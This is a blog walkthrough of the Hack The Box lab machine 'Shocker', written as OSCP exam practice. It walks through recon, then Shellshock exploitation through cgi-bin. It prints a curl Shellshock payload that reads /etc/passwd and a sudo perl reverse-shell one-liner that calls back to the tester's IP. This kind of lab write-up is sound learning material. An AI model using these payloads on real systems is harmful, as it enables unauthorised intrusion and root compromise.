Jan 18, 2020
Shocker — A HTB Walkthrough
Back again with another OSCP box. I’m sitting my OSCP sometime this year and aiming to pass before I begin my final university year which begins in late September. So over these remaining months I’ll be going over and re-doing all boxes I’ve done again in the beginning — but using minimal metasploit in preparation for the exam
Let’s start with the initial recon phase — scanning and enumeration:
As usual, nmap -sV -T4 -A -p- 10.10.10.56
Only two ports open and only HTTP really proving to be a proper attack vector. Running the usual web scans reveals nothing out of the ordinary so I go ahead with my dirbuster scan before crawling the website manually myself:
Nothing for us to see apart for 2x 403 codes, maybe the website itself provides more information, let’s dive in!
So there is literally nothing on this domain. No robots.txt or any functions to mess with on the site apart from a comical-looking picture of a bug telling us to not bug him. Hmm. Where to go from here?
Well to begin, we already have a major hint from the name of the box — “Shocker”. We then look back at the only directories available on the server and one of them is “cgi-bin” while the other is icons. If we put both these pieces together the puzzle becomes clear as to what the goal of this box is about, it’s exploiting the Shellshock vulnerability.
A little bit of Google Fu’ing and reading back and forth between Shellshock and the cgi-bin directories will enlighten your mind and expand your horizons and hacker mindsets.
To summarise quickly — the cgi-bin directory is a directory stored on the server which compiles and executes (typically) perl and shell scripts, rather than store them as basic HTML docs and whatnot.
Let’s now go back to our initial recon phase with dirbuster with the exception of adding in some extra extensions. I added in the common scripts that are typically in cgi-bin or potential executables i.e. php, sh, pl, py, rb :
Yes! Success. We’ve finally confirmed this to be true that Shellshock is the way forth. Upon navigating to http://10.10.10.56/cgi-bin/user.txt, we download a useless file — nothing interesting. What we can do here though is two things:
Run metasploit and gain shell
Manually exploit to gain RCE > Reverse Shell (We’re going with this one)
Taking a look at this gives us a one-liner we can run against the URL to get command execution:
curl -H “user-agent: () { :; }; echo; echo; /bin/bash -c ‘cat /etc/passwd’ ” \
http://10.10.10.56/cgi-bin/user.sh
I changed this to use a bash one liner from pentestmonkey.net to get a reverse shell connected to my netcat on port 1337
User shell achieved! Only one more stop ( an easier one )
First thing I did was run “ sudo -l” and it revealed we can /usr/bin/perl as ROOT.
Easy win!
Head to this brilliant site for all exploits on known binaries https://gtfobins.github.io/#
I went for the reverse shell again but this time as root. As simple as running :
sudo -l /usr/bin/perl -e ‘use Socket;$i=”10.10.14.16";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
(Change IP and PORT as needed)
Run this after you’ve set a new nc on port 1234 and you will have the reverse shell connected back to you :D
Thanks for taking your time out to read another OSCP writeup from me. I hope you’ve learned something new from this blog/my previous blogs whether it’s a new tool or bettering your methodology and enumeration. I do have plans for other types of blogs and not just HTB but those will be out later as I’m prioritising my OSCP preparation now that my exams are over for the meantime.
